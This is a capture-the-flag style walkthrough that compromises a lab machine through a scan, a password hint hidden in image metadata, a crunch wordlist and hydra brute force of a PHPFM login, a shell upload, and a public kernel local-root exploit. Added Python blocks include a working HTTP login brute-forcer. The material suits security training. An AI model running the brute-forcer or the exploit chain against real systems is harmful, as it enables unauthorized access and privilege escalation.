- Burp Suite
- PHPFM Arbitrary File Upload
- Linux Kernel 4.4.x (Ubuntu 16.04) - ‘double-fdput()’ in bpf(BPF_PROG_LOAD) Local Root Exploit
Use netdiscover to find the target IP address:
netdiscover -i eth0 -r 192.168.41.0/24
192.168.41.153 is the target.
Then run nmap to detect open ports and running services on the target machine:
nmap -sV -v -O -A -T5 192.168.41.153 -p-
Only port 80 is open.
Use nikto to scan:
nikto -h 192.168.41.153
No useful info comes out.
Still the same thing.
Check http://192.168.41.153 and find a picture:
Check the picture info:
It contains a path:
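The picture info step above is where the hidden directory comes from. As an added example (not part of the original walkthrough, and not the target's image), the following Python parses a JPEG's header segments and pulls printable strings out of the COM and APPn metadata segments, the same data `exiftool` or `strings` would show, then filters for anything that looks like a path or URL. The sample image bytes, the comment text and the `/hidden-dir/` value are constructed for the demo; whether the real picture stored its hint in a comment or in EXIF is an assumption.

```python
import re
import struct
from typing import Dict, Iterator, List, Tuple

# Markers that carry no length field (TEM, SOI, EOI, RST0-RST7).
_STANDALONE = {0x01, 0xD8, 0xD9} | set(range(0xD0, 0xD8))


def iter_jpeg_segments(data: bytes) -> Iterator[Tuple[int, bytes]]:
    """Yield (marker, payload) for every header segment before the scan data (SOS).

    Every metadata segment (JFIF, EXIF, XMP, comments) sits before SOS, so the
    entropy-coded image data never has to be parsed.
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected 0xFF marker prefix at offset {pos}")
        marker = data[pos + 1]
        if marker in (0xDA, 0xD9):  # SOS or EOI: no more metadata after this
            return
        if marker in _STANDALONE:
            pos += 2
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated segment header")
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])  # length includes its own 2 bytes
        payload = data[pos + 4:pos + 2 + length]
        yield marker, payload
        pos += 2 + length


def segment_name(marker: int) -> str:
    if marker == 0xFE:
        return "COM"
    if 0xE0 <= marker <= 0xEF:
        return f"APP{marker - 0xE0}"
    return f"0x{marker:02X}"


def extract_text_metadata(data: bytes, min_len: int = 4) -> Dict[str, List[str]]:
    """strings(1)-style: pull printable ASCII runs out of each COM/APPn segment."""
    found: Dict[str, List[str]] = {}
    for marker, payload in iter_jpeg_segments(data):
        if marker != 0xFE and not (0xE0 <= marker <= 0xEF):
            continue  # skip quantisation tables, Huffman tables, frame headers
        runs = [r.decode("ascii") for r in re.findall(rb"[ -~]{%d,}" % min_len, payload)]
        if runs:
            found.setdefault(segment_name(marker), []).extend(runs)
    return found


_PATH_RE = re.compile(r"https?://\S+|/[\w.\-/]+")


def find_paths(metadata: Dict[str, List[str]]) -> List[str]:
    """Return every URL- or path-looking token found in the extracted strings."""
    hits: List[str] = []
    for runs in metadata.values():
        for text in runs:
            hits.extend(_PATH_RE.findall(text))
    return hits


def _segment(marker: int, payload: bytes) -> bytes:
    return bytes([0xFF, marker]) + struct.pack(">H", len(payload) + 2) + payload


# Constructed sample: JFIF APP0 header, a COM segment hiding a directory name,
# then a bogus SOS section and EOI. This is NOT the image from the target box.
SAMPLE_JPEG = (
    b"\xff\xd8"
    + _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    + _segment(0xFE, b"hint: look under /hidden-dir/")
    + b"\xff\xda\x00\x02" + b"\x12\x34\x56"
    + b"\xff\xd9"
)

if __name__ == "__main__":
    meta = extract_text_metadata(SAMPLE_JPEG)
    print(meta)
    print(find_paths(meta))
```

On a real file, read it with `open(path, "rb").read()` and pass the bytes in; whatever `find_paths` returns is the candidate to feed back into nikto or a directory brute-forcer, as the walkthrough does in the next step.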
Now use nikto to scan that path:
nikto -h http://192.168.41.153/commodore64/
Find an interesting file.
Check that file:
Get the login page; the CMS seems to be PHPFM.
There is a PHPFM Arbitrary File Upload exploit, so I need a way to upload a shell. First, I have to get access to PHPFM.
At http://192.168.41.153/commodore64 I found:
I will try robhubbard as the username. The password hint: a C64 sound chip, lowercase, 3 letters + 4 digits without spaces. After checking Wikipedia and a few more sites, MOS (MOS Technology, maker of the C64's SID sound chip) fits the 3 letters. Time to make a dictionary of mos + 4 digits, with a minimum and maximum length of 7:
crunch 7 7 -t mos%%%% > test.txt
Before using hydra to crack the password, I use Burp to capture the incorrect-login response (hydra needs that text as its failure string):
Get the password:
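The crunch, Burp and hydra steps above fit together as one procedure: build the candidate list, learn what a failed login looks like, then treat any response that lacks that text as a hit. As an added example (not the author's commands, and the hydra invocation itself is not shown on the page), the following Python reproduces that logic offline. `crunch_pattern` expands the `-t mos%%%%` pattern exactly as crunch does for the `%` digit placeholder; `brute_force` implements hydra's `F=` failure-string check; `http_post_login` is the real transport, with placeholder form field names that must be replaced by the ones seen in the Burp capture; `fake_phpfm` is a constructed stand-in for the login page, and both its "Wrong login" text and the `mos0042` password are made up for the demo, not taken from the target.

```python
import itertools
import urllib.parse
import urllib.request
from typing import Callable, Iterable, List, Optional

LoginFn = Callable[[str, str], str]  # (username, password) -> response body


def crunch_pattern(pattern: str) -> List[str]:
    """Expand a crunch-style -t pattern where each '%' is a digit slot and every
    other character is literal. Only the '%' placeholder is implemented.
    crunch_pattern("mos%%%%") yields the same 10000 words as `crunch 7 7 -t mos%%%%`.
    """
    slots = ["0123456789" if ch == "%" else ch for ch in pattern]
    return ["".join(combo) for combo in itertools.product(*slots)]


def http_post_login(url: str, user_field: str, pass_field: str) -> LoginFn:
    """Real transport: POST the login form like hydra's http-post-form module.
    user_field/pass_field are placeholders; copy the real names from Burp."""
    def post(username: str, password: str) -> str:
        body = urllib.parse.urlencode({user_field: username, pass_field: password}).encode()
        req = urllib.request.Request(url, data=body, method="POST")
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode("utf-8", errors="replace")
    return post


def brute_force(post_login: LoginFn, username: str, candidates: Iterable[str],
                failure_marker: str) -> Optional[str]:
    """Hydra F= logic: the first response that does NOT contain the failure
    marker captured in Burp is treated as a successful login."""
    for password in candidates:
        if failure_marker not in post_login(username, password):
            return password
    return None


def fake_phpfm(correct_password: str) -> LoginFn:
    """Constructed stand-in for the PHPFM login so the block runs offline.
    The response text and the password are invented, not from the target."""
    def post(username: str, password: str) -> str:
        if username == "robhubbard" and password == correct_password:
            return "<html><body>Welcome robhubbard - PHPFM file manager</body></html>"
        return "<html><body><b>Wrong login</b></body></html>"
    return post


if __name__ == "__main__":
    wordlist = crunch_pattern("mos%%%%")
    target = fake_phpfm("mos0042")  # constructed password for the demo
    print(brute_force(target, "robhubbard", wordlist, failure_marker="Wrong login"))
```

Against the real box you would swap `fake_phpfm(...)` for `http_post_login("http://192.168.41.153/commodore64/<login page>", "<user field>", "<pass field>")` with the values read from the Burp request, and pass the exact failure text Burp showed as `failure_marker`. The failure-string check is also the part that goes wrong most often: if the marker is too generic (it also appears in a successful response) every password is rejected, and if it is too specific (it changes between attempts) the very first candidate looks like a hit.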
Log in and get the page:
Set up a netcat listener and browse to
Get the shell:
Since the Linux kernel version here is 4.4.0:
searchsploit 4.4 | grep linux
Linux Kernel 4.4.x (Ubuntu 16.04) - double-fdput() in bpf(BPF_PROG_LOAD) Local Root Exploit
Upload 39772.zip via PHPFM, then in the shell:
find / -name 39772.zip
which shows where the file landed:
Get root: